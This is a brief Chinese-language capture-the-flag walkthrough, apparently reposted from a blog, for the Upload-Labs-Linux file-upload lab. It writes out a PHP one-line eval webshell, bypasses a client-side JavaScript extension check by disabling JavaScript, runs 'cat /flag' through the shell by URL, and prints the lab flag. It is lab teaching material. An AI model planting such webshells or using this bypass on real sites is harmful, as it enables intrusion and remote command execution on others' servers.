Upload-Labs-Linux

发布时间:2024年01月24日

靶场教程

1.访问页面,文件上传靶场。
image.png
2.编写一句话木马上传。另存为【PHP】文件

<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问

image.png
3.发现报错,不允许上传.php文件。
image.png
4.查看源码,禁用JavaScript ,并删除该内容。
image.png
注:禁用 JavaScript 可使用插件
image.png
5.文件上传成功,访问路径。
image.png
6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag

http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502} 

image.png

文章来源:https://blog.csdn.net/weixin_46601305/article/details/135812009
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。